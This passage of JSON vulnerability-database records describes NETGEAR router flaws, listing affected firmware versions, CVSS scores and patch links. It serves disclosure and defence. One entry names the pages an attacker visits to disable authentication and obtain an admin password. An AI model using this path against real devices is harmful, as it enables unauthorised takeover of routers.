"title": "Multiple NETGEAR Fixing measures for product injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117216"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-74",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18794"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049368/security-advisory-for-command-injection-vulnerability-on-d6100-and-some-routers-psv-2017-0321"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18794"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"date": "2020-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"date": "2020-04-21T19:15:12.097000",
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63372"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014926"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1821"
},
{
"date": "2024-11-21T03:20:56.440000",
"db": "NVD",
"id": "CVE-2017-18794"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Injection vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014926"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1821"
}
],
"trust": 0.6
}
}
var-202004-1325
Vulnerability from variot
Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R7000 is a wireless router. NETGEAR R6900 is a wireless router.
There are security holes in many NETGEAR products. Attackers can use this vulnerability to recover passwords and access files. This affects D8500 1.0.3.27 and previous versions, DGN2200v4 1.0.0.82 and previous versions, R6300v2 1.0.4.06 and previous versions, R6400 1.0.1.20 and previous versions, R6400v2 1.0.2.18 and previous versions, R6700 1.0.1.22 and previous versions, R6900 1.0.1.20 and previous versions, R7000 1.0.7.10 and previous versions, R7000P 1.0.0.58 and previous versions, R7100LG 1.0.0.28 and previous versions, R7300DST 1.0.0.52 and previous versions, R7900 1.0.1.12 and previous versions, R8000 1.0.3.46 and previous versions, R8300 1.0.2.86 and previous versions, R8500 1.0.2.86 and previous versions, WNDR3400v3 1.0.1.8 and previous versions, and WNDR4500v2 1.0.0.62 and previous versions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1325",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dgn2200",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "r6300",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6700",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7000",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "wndr4500",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r6400",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r7000p",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r8000",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r6400",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r8300",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "d8500",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.27"
},
{
"model": "r7100lg",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r6900",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r8500",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "wndr3400",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7300dst",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.3.27"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "d8500",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.3.27"
},
{
"model": "r6300v2",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.4.06"
},
{
"model": "r6400",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.1.20"
},
{
"model": "r6400v2",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.2.18"
},
{
"model": "r6700",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.1.22"
},
{
"model": "r6900",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.1.20"
},
{
"model": "r7000",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.7.10"
},
{
"model": "r7000p",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.58"
},
{
"model": "r7100lg",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.28"
},
{
"model": "r7300dst",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.52"
},
{
"model": "r7900",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.1.12"
},
{
"model": "r8000",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.3.46"
},
{
"model": "r8300",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.2.86"
},
{
"model": "r8500",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.2.86"
},
{
"model": "wndr3400v3",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.1.8"
},
{
"model": "wndr4500v2",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.62"
},
{
"model": "dgn2200v4",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.0.0.82"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
}
]
},
"cve": "CVE-2017-18853",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-18853",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014981",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2020-29737",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18853",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18853",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014981",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18853",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18853",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2017-014981",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-29737",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2383",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-18853",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R7000 is a wireless router. NETGEAR R6900 is a wireless router. \n\r\n\r\nThere are security holes in many NETGEAR products. Attackers can use this vulnerability to recover passwords and access files. This affects D8500 1.0.3.27 and previous versions, DGN2200v4 1.0.0.82 and previous versions, R6300v2 1.0.4.06 and previous versions, R6400 1.0.1.20 and previous versions, R6400v2 1.0.2.18 and previous versions, R6700 1.0.1.22 and previous versions, R6900 1.0.1.20 and previous versions, R7000 1.0.7.10 and previous versions, R7000P 1.0.0.58 and previous versions, R7100LG 1.0.0.28 and previous versions, R7300DST 1.0.0.52 and previous versions, R7900 1.0.1.12 and previous versions, R8000 1.0.3.46 and previous versions, R8300 1.0.2.86 and previous versions, R8500 1.0.2.86 and previous versions, WNDR3400v3 1.0.1.8 and previous versions, and WNDR4500v2 1.0.0.62 and previous versions",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18853",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-29737",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-18853",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"id": "VAR-202004-1325",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
}
],
"trust": 1.1207275783333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
}
]
},
"last_update_date": "2024-11-23T22:48:01.690000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Password Recovery and File Access on Some Routers and Modem Routers, PSV-2017-0677",
"trust": 0.8,
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
},
{
"title": "Patch for Multiple NETGEAR product information disclosure vulnerabilities (CNVD-2020-29737)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/217497"
},
{
"title": "Multiple NETGEAR Product information disclosure vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117758"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18853"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000045848/security-advisory-for-password-recovery-and-file-access-on-some-routers-and-modem-routers-psv-2017-0677"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18853"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"date": "2020-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"date": "2020-06-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"date": "2020-04-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"date": "2020-04-29T14:15:12.370000",
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-29737"
},
{
"date": "2020-05-05T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18853"
},
{
"date": "2020-06-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014981"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2383"
},
{
"date": "2024-11-21T03:21:05.863000",
"db": "NVD",
"id": "CVE-2017-18853"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014981"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2383"
}
],
"trust": 0.6
}
}
var-201910-1260
Vulnerability from variot
Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L. plural NETGEAR The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NETGEAR AC1450, etc. are all wireless routers of NETGEAR.
A number of NETGEAR products have authorization issues. The vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products. There is currently no detailed vulnerability details provided
Show details on source website{
"@context": {
